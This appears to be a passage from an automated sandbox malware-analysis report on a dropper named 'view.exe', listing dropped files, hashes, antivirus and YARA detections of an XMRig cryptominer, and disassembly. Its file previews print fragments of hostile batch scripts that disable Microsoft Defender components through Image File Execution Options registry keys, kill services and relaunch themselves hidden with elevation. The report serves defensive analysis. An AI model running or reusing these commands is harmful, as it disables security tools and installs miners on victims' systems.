                                                                                                              SHA-512:87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Virustotal, Detection: 12%, Browse
                                                                                                              • Antivirus: Metadefender, Detection: 17%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 14%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: pip install.yp.exe, Detection: malicious, Browse
                                                                                                              • Filename: Proforma.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Trojan.MulDrop17.50581.24010.exe, Detection: malicious, Browse
                                                                                                              • Filename: nCodePKIComponent_Setup_64_bit_java.exe, Detection: malicious, Browse
                                                                                                              • Filename: nCodePKIComponent_Setup_64_bit_java.exe, Detection: malicious, Browse
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                              C:\ProgramData\xmrig.cmd
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):10063
                                                                                                              Entropy (8bit):5.227823543311822
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:K5V1Y1wNIO7Ms0aAqEm5/MQMh0MEMmEMMVmoUIeE8E3VQVz1vNt7JcHTX2+B61qI:3uIv2HHY8EFgvNt7Ob6cwo+DL91
                                                                                                              MD5:4465B515E66A47EEC5A2F0491356C29D
                                                                                                              SHA1:43F1C9F941F87F184A6A9AEDD35CA55F2FFB8B0F
                                                                                                              SHA-256:BC3AE6BA907DB9B312B509CCF4E207E7DDBD6CC571D2A4807774A1DA03554CC1
                                                                                                              SHA-512:4909AC1B291B783792D6EACAF7759A613F8AD8D63CD1232960116BC7982DC687E30E6CE847AD43B1B922CC0DEC71ABF85ACA35EFBE0DE56FE3B0DC149C37DD61
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\xmrig.cmd, Author: Joe Security
                                                                                                              Preview: @Echo off..for %%a in (C:\ProgramData\screen.exe) do set namescsc=%%~za..if "%namescsc%" gtr "40568" (Set "runscsc=C:\ProgramData\screen.exe" &Goto :scsc)..for %%a in (C:\ProgramData\Intel\screen.exe) do set namescsc=%%~za..if "%namescsc%" gtr "40568" (Set "runscsc=C:\ProgramData\Intel\screen.exe" &Goto :scsc)..for %%a in (C:\Windows\SysWOW64\screen.exe) do set namescsc=%%~za..if "%namescsc%" gtr "40568" (Set "runscsc=C:\Windows\SysWOW64\screen.exe" &Goto :scsc)..:scsc..CD "C:\ProgramData"..IF EXIST "C:\ProgramData\USOShared\web.ttf" (..goto :Chuanaa..) else (..attrib -h -r -s "C:\Windows\Options\*.*" >nul 2>nul..Copy /v /b /y "C:\Windows\Options\*.*" "C:\ProgramData\USOShared\*" >nul 2>nul..)..IF EXIST "C:\ProgramData\Aeroadmin\web.ttf" (..goto :Backaa..) else (..goto :Chuanaa..)..:Backaa..wmic process where name="IntelSvc.exe" call terminate >nul 2>nul..TASKKILL /im "IntelSvc.exe" /F /t >nul 2>nul..NET stop "Intel(R) Utiliti" >nul 2>nul..Sc delete "Intel(R) Utiliti" >nul 2>nul..wmic
                                                                                                              C:\Users\Public\Public.cmd
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:DOS batch file, ISO-8859 text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):153202
                                                                                                              Entropy (8bit):5.387224648593431
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:4EtDXlk+69EvbVf0DmOwja+raPorH3SJnOiqU8tWYXE:4kiPIb1Em1rH3SJOiqU8tWyE
                                                                                                              MD5:6B68A8A65ABDC917B251343FFC79D039
                                                                                                              SHA1:6A6F51025D335B9DB411493ACE683B15B8BD74D0
                                                                                                              SHA-256:504D5A81612BF0DC095DF80FEA97CBF3F114B3D1EAD3356DB7BA8C92AEBB7938
                                                                                                              SHA-512:57FE1F718AC82B1742C048291B8C6C4A107BC630E6F090047B6A1E4B6C69B1D06EDA52F09FC19D8F86D8639AA9819B8D17FD4C817F9A3F8D4B79F96980EE3FCA
                                                                                                              Malicious:false
                                                                                                              Preview: @echo off..MD "C:\ProgramData\Internet Explorer" >nul 2>nul..set "use=%Username%"..if "%use%"=="" Goto :setlai..Goto :okuse..:setlai..Set use=%AppData:AppData\Roaming=%..Set use=%use:C:\Users=%..Set use=%use:\=%..:okuse..reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe" /v Defender1 /t REG_SZ /d "cmd.exe" /f..reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe" /v Defender2 /t REG_SZ /d "cmd.exe" /f..reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseIR.exe" /v Defender3 /t REG_SZ /d "cmd.exe" /f..reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseNdr.exe" /v Defender4 /t REG_SZ /d "cmd.exe" /f..reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseSampleUploader.exe" /v Defender5 /t REG_SZ /d "cmd.exe" /f..reg.exe ADD "HKLM\SOFTWARE\Microsof
                                                                                                              C:\Users\Public\StartPublic.cmd
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):190
                                                                                                              Entropy (8bit):4.915575397235928
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:mKDDVNKgFKLFKTvaybS0zZkREpVFAVyHorXZkREpVFA1EwOaHF516HyIDoYwDTkL:hOvLFKrpbS0KrVyIrGrOPaHp67DMQyjo
                                                                                                              MD5:52346E4ABF77201D09832A15F85600BE
                                                                                                              SHA1:B558CEEB9C49ADFD242AB15BBD95AA6B38BE2492
                                                                                                              SHA-256:914B5E61534A4D841DD157309B63EACE27AF070F31759C23D47767AF455E2E5A
                                                                                                              SHA-512:F713A0D53A48EAC2A0CDC193F06C87DB956AAEE3E32B146649CD75F13EA2B337C2D1D331CEC37F62C97E0098BABEAEB3464EF631A15D3AFC7192CF81705D6471
                                                                                                              Malicious:false
                                                                                                              Preview: @echo off..choice /n /c yn /t 1 /d y >nul 2>nul.."C:\ProgramData\screen.exe" elevate "C:\ProgramData\screen.exe" exec hide "C:\Users\Public\Public.cmd" ..@del /f /q "%~f0" >nul 2>nul..Exit..
                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.11002646176158723
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:26KoAXm/Ey6q9995VAq3qQ10nMCldimE8eawHjcwmr:26Nxl68dLyMCldzE9BHjcHr
                                                                                                              MD5:E3C12DC90A83A378C3E6C5A2BD8C5AA2
                                                                                                              SHA1:8AADC524EFE8D8F46DBAB2CB47360623AD26AA97
                                                                                                              SHA-256:0B67C7A546523CFB3311BCEB0D7B5396793EE8D0030EC97140B81C40E98A4DA0
                                                                                                              SHA-512:6427B352C0A93596EA9704BBBF2D2D2DBDECBB770898670EF1BAE82785B8EF733CC3ED825ED15BC60CBCEBA5834918D2EC70DD46F3FD8F0AEDECFCC2C070763E
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................t...|...../......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................p1..... .....+..?...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.t...|...5./.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.11239577642311048
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:O+mXm/Ey6q9995V4d1miM3qQ10nMCldimE8eawHza1miID8f:Vl68c1tMLyMCldzE9BHza1tIO
                                                                                                              MD5:560C99ABC7A1CCA7C0380F08752C6080
                                                                                                              SHA1:721FAE606F069CB55F6BB4B3CF9DA04E48ADE954
                                                                                                              SHA-256:3C64B62B889BFD54357ABCA8DB74C2F6B56563FD98B06399EB2D958331145EBA
                                                                                                              SHA-512:CD3A4687FFC42601FA2B18C5937D48D3C79C5365E7675680A75AEA1411A28C96C90444E92A95C990307ECFD7CCE421632740E5F721838781C4FC02EDA3320CED
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................t...|.....-......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................p1..... .....a*.?...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.t...|...!.-.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.11226189601626319
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:OC9/6jXm/Ey6q9995V4d1mK2P3qQ10nMCldimE8eawHza1mKGZP:/l68c1iPLyMCldzE9BHza1a
                                                                                                              MD5:5CE541F2D92612A4F678416B92D4A36C
                                                                                                              SHA1:DB98DF97AED91B26461B88F187CB269BD5AE043A
                                                                                                              SHA-256:CAEEF1673304B0A89DF68F57C0D8FE09EFEF07ED9547221CA7E359FC5CDCD2C1
                                                                                                              SHA-512:6CD7A5FDAE7BD1492F7059960546AE318A011D878A753B20FC7CF4913184F80CBEAD406E249D0CBB6B875A99E99128902909435C33104CAAB68E804A6947F6FC
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................t...|...\.,......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................p1..... .....a*.?...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.t...|.....,.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\Internet Explorer.zip
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:Zip archive data, at least v1.0 to extract
                                                                                                              Category:dropped
                                                                                                              Size (bytes):19307126
                                                                                                              Entropy (8bit):7.988254905421344
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:393216:XWhnCW3M6rcfNA7SmTqX6cvncQea1Xn6ZCwc+2ziVwtMXn:MCeM60NAm5vTwKzawtM3
                                                                                                              MD5:21C2C5C1EB31B433F1AC07F4E43CC76F
                                                                                                              SHA1:6BD4CB1E05C06F742D6E3CCCC29F8FA42A988836
                                                                                                              SHA-256:423E48945EF08864923D121F6B36DED3994FFD539DB71CCAFD634AF2A763FB90
                                                                                                              SHA-512:641BE34D196C50A1DEFEB393FD283C26E0F63406AE312055176F28E8C361198EF70DB7C12A4BC38F4764AD1C55B7C97BACDBC1EBC8B5E91831DE5B128A3836A4
                                                                                                              Malicious:false
                                                                                                              Preview: PK........-#.R................Internet Explorer/PK...........SC=`.....0.......Internet Explorer/config.json.V]O.0.}.WTy.Y.R`{.@b.(..4."4.:...c..I.M...i.|8.s..=...~..s4r#..O....`../...oX%..5y.j.y?!.Um.(`..O^.7.0.Ic..M...L.........h..r../K...Q[......(.4P.;.+..T.Bt.ETr.M{.e.w.k.......iC\........4]..).@xt....W....h...d.(r....b(W..Y....W.@.O..Ljfw}&.\..QR...C...&..:."&,W...\A.UeI.[b.o...|....6.H.w..d<..G.x4{....A}.......M.<.{X....-.......Z...p.......o:.....>...Y...b..........JV..#....$..C........^L..H*.....;._.\B.:.F..Zj_....e....H.b...2..N....c....aY..Ai..58.S.f.[N"...UEoz...l-ye.d"....m..B.;d..c*.O''..;..;.. ...>....w..:]....bq}.W..-L1O.\..>=.{.t....'....t..f.R].%....5$.....T.....b.u....G.....e5KI..u.%.Q..d.<...Q.ge...y...f.p..)jw......;..,#.......5q_Hm.5..s...Q.X..........f$Ljt..b.7.w.K|.5;.J.-...w...w+.;]DQ.0.k....2..6.D.....d.4....q...N.".+Y..%\.X...7u...d...l.../PK...........P.7.A.8....G.*...Internet Explorer/nvrtc-builtins64_102.dll.}.|SE.
                                                                                                              C:\Users\user\AppData\Local\Temp\ProgramData.zip
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:Zip archive data, at least v1.0 to extract
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4704731
                                                                                                              Entropy (8bit):7.998300679007255
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:lLg3+xunVDdF4AwiOmL56BcYO+p9Cxj7nj6c10NMNsIq:loeuZdOZI5gZpgxjfB10NMNHq
                                                                                                              MD5:E6EF33648AF3CED13E97AC678D68DE3E
                                                                                                              SHA1:ACB651F1EDFB981C0C9784A2607E02AF5B07C8DE
                                                                                                              SHA-256:4237FCBD09FD453E03C795993E2C9323D38DC94C61E531C143A8573D6AD715E5
                                                                                                              SHA-512:83CFA5BE4D45BCA1544E406FCE810B94CEF26DDF7A9E9FB971504EFD1A93F8AE8710308AD44FB1CB6BF845F60B7F0483DA7A5F818ECE7D2DD68CEF3A337F90D3
                                                                                                              Malicious:false
                                                                                                              Preview: PK...........S................ProgramData/PK.........c.RH...H;....4.....ProgramData/IntelSvc.exe..|..0>...(...DID"@PSgi.....9.d..._.!...@MHC..1.(v.2....,dK.i..o.4..!......P....(......M...w..-9.B......O...8.....{.....^...>. l..?....9:A.>....S^8{...k.o....q..i...V..)h..:....V.+kl.i.u.N..e.....?8....U.}.b........~.\..u.._..6...k.;g.w.V&.~.x.?.z.{:....&.F..Q.Y..}0..G...k..:D........o~...7|.....W.[..t...^.H./....E6A.7.."..`..6..x.&.....^.._%..(....)#....^....V,......=8g.`..\w_,4?..6N;W..N..~.`..2....8..)|....Z.p5....a_..<..t..+.... ..f.}...%..l..B5..b.Q..9_...p...w....uAP..}....+'.w.u.n..@}G...p./..o.0.7../..>...=..n.Yq..}...}...#.v.sn.U..G......]c.5u|...$R.<.....G.]......<9@..p.......AZ...7S...7S.&.n...1..k.|.cW..J..#...5~..n..F9....v..c..6....u&D.|\..........gc../.*yE...[....#zVd.bv.r.)f.y..}...LF.......;.B..G....r.K..>...>.>m..O....].>........p.......z.!TU.....7.....P..7SUt.-.R.Y.....h.4..E.$..E.....I.......blj..iC....V.w@.
                                                                                                              C:\Users\user\AppData\Local\Temp\unpro.exe
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):167936
                                                                                                              Entropy (8bit):6.1797557233483955
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
                                                                                                              MD5:75375C22C72F1BEB76BEA39C22A1ED68
                                                                                                              SHA1:E1652B058195DB3F5F754B7AB430652AE04A50B8
                                                                                                              SHA-256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
                                                                                                              SHA-512:1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Cf9ZQeSpK3.exe, Detection: malicious, Browse
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R.D.3...3...3...,...3...3...3.../...3.......3.../...3.......3..Rich.3..........................PE..L...P.#B............................xH............@.........................................................................07..P....................................................................................................................text............................... ..`.rdata...a.......p..................@..@.data....b...P...@...P..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001@. (copy)
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.11002646176158723
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:26KoAXm/Ey6q9995VAq3qQ10nMCldimE8eawHjcwmr:26Nxl68dLyMCldzE9BHjcHr
                                                                                                              MD5:E3C12DC90A83A378C3E6C5A2BD8C5AA2
                                                                                                              SHA1:8AADC524EFE8D8F46DBAB2CB47360623AD26AA97
                                                                                                              SHA-256:0B67C7A546523CFB3311BCEB0D7B5396793EE8D0030EC97140B81C40E98A4DA0
                                                                                                              SHA-512:6427B352C0A93596EA9704BBBF2D2D2DBDECBB770898670EF1BAE82785B8EF733CC3ED825ED15BC60CBCEBA5834918D2EC70DD46F3FD8F0AEDECFCC2C070763E
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................t...|...../......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................p1..... .....+..?...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.t...|...5./.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.11239577642311048
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:O+mXm/Ey6q9995V4d1miM3qQ10nMCldimE8eawHza1miID8f:Vl68c1tMLyMCldzE9BHza1tIO
                                                                                                              MD5:560C99ABC7A1CCA7C0380F08752C6080
                                                                                                              SHA1:721FAE606F069CB55F6BB4B3CF9DA04E48ADE954
                                                                                                              SHA-256:3C64B62B889BFD54357ABCA8DB74C2F6B56563FD98B06399EB2D958331145EBA
                                                                                                              SHA-512:CD3A4687FFC42601FA2B18C5937D48D3C79C5365E7675680A75AEA1411A28C96C90444E92A95C990307ECFD7CCE421632740E5F721838781C4FC02EDA3320CED
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................t...|.....-......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................p1..... .....a*.?...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.t...|...!.-.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy)
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.11226189601626319
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:OC9/6jXm/Ey6q9995V4d1mK2P3qQ10nMCldimE8eawHza1mKGZP:/l68c1iPLyMCldzE9BHza1a
                                                                                                              MD5:5CE541F2D92612A4F678416B92D4A36C
                                                                                                              SHA1:DB98DF97AED91B26461B88F187CB269BD5AE043A
                                                                                                              SHA-256:CAEEF1673304B0A89DF68F57C0D8FE09EFEF07ED9547221CA7E359FC5CDCD2C1
                                                                                                              SHA-512:6CD7A5FDAE7BD1492F7059960546AE318A011D878A753B20FC7CF4913184F80CBEAD406E249D0CBB6B875A99E99128902909435C33104CAAB68E804A6947F6FC
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................t...|...\.,......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................p1..... .....a*.?...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.t...|.....,.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):55
                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                              Malicious:false
                                                                                                              Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                              \Device\Null
                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):226
                                                                                                              Entropy (8bit):4.7583691511216015
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:9LGCcqtWXpFEGvcqLGUcqLGo/y9cqtWXpF2Rsyn:9LGC7Q7LGU7LGT7Nh
                                                                                                              MD5:70AC3343AD88FEF936BC017E5B929173
                                                                                                              SHA1:3460FE660528FC80BB32ED2C2432DC00564F3877
                                                                                                              SHA-256:864C584F1241523E2871E27207DE7D9AED5AB2C4D1D6F01E51C15332F2196303
                                                                                                              SHA-512:EE16FAC7B78C36CD47D4F03CE55A9EC154DE60C804E874015D9C57B78DE15C3BEA87A3F7B52D646A934E4EB0C3C52D44DC576A803DCE20A4D6F9CE6C7C13B864
                                                                                                              Malicious:false
                                                                                                              Preview: Could Not Find C:\ProgramData\localdir.vbs..Could Not Find C:\Users\user\Desktop\localdir.vbs..Could Not Find C:\ProgramData\view.exe..Could Not Find C:\ProgramData\Start.exe..Could Not Find C:\Users\user\Desktop\Start.exe..

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.986999978153143
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                                                              • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                              • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              File name:view.exe
                                                                                                              File size:24618496
                                                                                                              MD5:07deb2ac0ec36137243459603d1e7ee0
                                                                                                              SHA1:bd8056e5ff137fa27cd1c89f8452be000771d831
                                                                                                              SHA256:61c3940a461c53bfb0db4b5b0313a61b81a588c1970715a250f01f3101c7ccc5
                                                                                                              SHA512:09b0f14c57e3fdea93717f351f4ff5e08327365e556ea83e2ace85247b7795475401692c02b819aee17c8262b9bce4258491dc346b74dfa547e64e986e75f306
                                                                                                              SSDEEP:393216:VAuWhnCW3M6rcfNA7SmTqX6cvncQea1Xn6ZCwc+2ziVwtMXkoOZI59xrPMMRc:VA5CeM60NAm5vTwKzawtMUTZM9BJc
                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00928e8e868eb000

                                                                                                              General

                                                                                                              Entrypoint:0x4138e0
                                                                                                              Entrypoint Section:CODE
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:8121da246ea94cbab5bbea46d181bdcb
                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              mov ecx, 0000000Dh
                                                                                                              push 00000000h
                                                                                                              push 00000000h
                                                                                                              dec ecx
                                                                                                              jne 00007F4ED084DE2Bh
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov eax, 00413850h
                                                                                                              call 00007F4ED083FD65h
                                                                                                              xor eax, eax
                                                                                                              push ebp
                                                                                                              push 00413FACh
                                                                                                              push dword ptr fs:[eax]
                                                                                                              mov dword ptr fs:[eax], esp
                                                                                                              mov eax, 00000190h
                                                                                                              call 00007F4ED084C911h
                                                                                                              test al, al
                                                                                                              je 00007F4ED084DE39h
                                                                                                              push 00000000h
                                                                                                              call 00007F4ED083FE3Eh
                                                                                                              lea edx, dword ptr [ebp-14h]
                                                                                                              mov eax, 00000001h
                                                                                                              call 00007F4ED083CDFDh
                                                                                                              mov eax, dword ptr [ebp-14h]
                                                                                                              push eax
                                                                                                              lea edx, dword ptr [ebp-18h]
                                                                                                              xor eax, eax
                                                                                                              call 00007F4ED083CDEFh
                                                                                                              mov edx, dword ptr [ebp-18h]
                                                                                                              pop eax
                                                                                                              call 00007F4ED083E42Eh
                                                                                                              jne 00007F4ED084DE6Dh
                                                                                                              call 00007F4ED084D8A7h
                                                                                                              mov eax, 0000000Ah
                                                                                                              call 00007F4ED084CE49h
                                                                                                              jmp 00007F4ED084DE98h
                                                                                                              lea edx, dword ptr [ebp-1Ch]
                                                                                                              mov eax, 00000001h
                                                                                                              call 00007F4ED083CDC6h
                                                                                                              mov eax, dword ptr [ebp-1Ch]
                                                                                                              push eax
                                                                                                              lea edx, dword ptr [ebp-20h]
                                                                                                              xor eax, eax
                                                                                                              call 00007F4ED083CDB8h
                                                                                                              mov edx, dword ptr [ebp-20h]
                                                                                                              pop eax
